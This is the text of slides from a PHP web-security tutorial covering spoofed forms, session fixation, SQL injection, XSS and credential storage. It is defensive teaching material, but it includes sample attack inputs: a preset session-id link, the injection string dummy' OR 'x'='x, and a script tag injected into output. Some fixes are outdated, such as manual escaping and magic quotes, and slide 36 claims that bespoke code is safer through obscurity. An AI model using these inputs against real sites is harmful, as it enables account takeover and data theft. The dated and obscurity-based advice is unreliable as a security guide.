  • 19. Spoofed Forms: Example The form written by a web developer to be submitted to a page: <form action=&quot;/process.php&quot; method=&quot;POST&quot;> <select name=&quot;colour&quot;> <option value=&quot;red&quot;>red</option> <option value=&quot;green&quot;>green</option> <option value=&quot;blue&quot;>blue</option> </select> <input type=&quot;submit&quot; /> </form> The user writes their own form to submit to the same page : <form action=&quot;http://example.org/process.php&quot; method=&quot;POST&quot;> <input type=&quot;text&quot; name=&quot;colour&quot; /> <input type=&quot;submit&quot; /> </form>
  • 20. Spoofed Forms: Solution Users can submit whatever they like to your PHP page… and it will be accepted as long as it conforms to your rules. Make sure all your rules are checked by the PHP external data filter, don’t rely on a form to exert rules for you.. They can be changed!
  • 21. Session Fixation: Eh? Session attacks nearly always involve impersonation – the malicious user is trying to ‘steal’ someone else’s session on your site. The crucial bit of information to obtain is the session id, and session fixation is a technique of stealing this id.
  • 22. Session Fixation: Eh? 1. The malicious user hosts a page with links to your site/emails around spam links to your site with a session id already set . … < a href=“http://example.com/index.php ?PHPSESSID=1234 ” …
  • 23. Session Fixation: Eh? 2. A client follows one of these links and is directed to your site, where they login. 3. Now.. the malicious user knows the session id (he/she set it!), and can ‘hijack’ the session by browsing to your site using the same session id. 4. Malicious user is now logged in as one of your legitimate clients. Ooops.
  • 24. Session Fixation: Solution To protect against this type of attack, first consider that hijacking a session is only really useful after the user has logged in or otherwise obtained a heightened level of privilege. If we regenerate the session identifier whenever there is any change in privilege level (for example, after verifying a username and password), we will have practically eliminated the risk of a successful session fixation attack.
  • 25. Session Fixation: Solution session_regenerate_id () Conveniently, PHP has a function that does all the work for you, and regenerates the session id. Regenerate the session id using this function before any change in privilege level.
  • 26. SQL Injection: Eh? The goal of SQL injection is to insert arbitrary data, most often a database query, into a string that’s eventually executed by the database.
  • 27. SQL Injection: Example Consider this query executed in PHP on a MYSQL db, where the email text has been submitted from the user: “ SELECT * FROM members WHERE email = ‘ {$_POST[ ‘email’ ]} ’”
  • 28. SQL Injection: Example The use of $_POST[..] in the query should immediately raise warning flags. Consider if a user submitted the following email: dummy’ OR ‘x’=‘x The query now becomes, SELECT * FROM members WHERE email = ‘ dummy’ OR ‘x’=‘x ’ ..which will return the details of all members!
  • 29. SQL Injection: Solution Filter input data . Quote your data . If your database allows it (MySQL does), put single quotes around all values in your SQL statements, regardless of the data type. Escape your data . For a MySQL db, use the function mysql_real_escape_string ()
  • 30. Accessing Credentials Sometimes you need to store sensitive data on your server such as database passwords, usernames, etc. There are various options…
  • 31. Accessing Credentials Don’t store passwords in an included file without a *.php extension but in a web accessible directory…! You can store in a *.php file under the root (i.e. web accessible). OK, but not great. If your PHP parse engine fails, this data will be on plain view to the entire world. Better , is to keep as much code as possible, including definition of passwords, in included files outside of the web accessible directories. With an Apache server, there are various techniques to include passwords and usernames as environment variables, accessed in PHP by the $_SERVER superglobal. best worst
  • 32. Cross-Site Scripting (XSS) This is a good example of why you should always escape all output, even for xhtml… echo &quot;<p>Welcome back, {$_GET[ 'username' ]} .</p>&quot; ; echo &quot;<p>Welcome back, <script>...</script> .</p>&quot; ;
  • 33. XXS: The Solution And again.. Filter input. Escape Output. Be especially careful if you are writing user input to a file, which is later include d into your page.. Without checking, the user can then write their own PHP scripts for inclusion.
  • 34. The ‘magic’ of PHP Recent versions of PHP have gone some way to tightening security, and one of the newer things is ‘ magic quotes ’. If turned on, this automatically escapes quotation marks and backslashes in any incoming data. Although useful for beginners, it cannot be relied upon if you want to write portable code. http://docs.php.net/en/security.magicquotes.html
  • 35. The ‘magic’ of PHP: banished! To know where you are starting from, you can use the get_magic_quotes_gpc () function to tell if they are on or off. To start from a consistent point, use stripslashes () to remove any escape characters added by ‘magic quotes’. e.g. if ( get_magic_quotes_gpc ()) { $thing = stripslashes ($_POST[ ‘thing’ ]); }
  • 36. Phew.. But don’t panic! Open Source PHP code needs to be rock solid in terms of security, as everyone can look through the code. In your bespoke solutions, malicious users will have to try to guess.. Much harder!
  • 37. Review Filter Input + Escape Output = Secure Code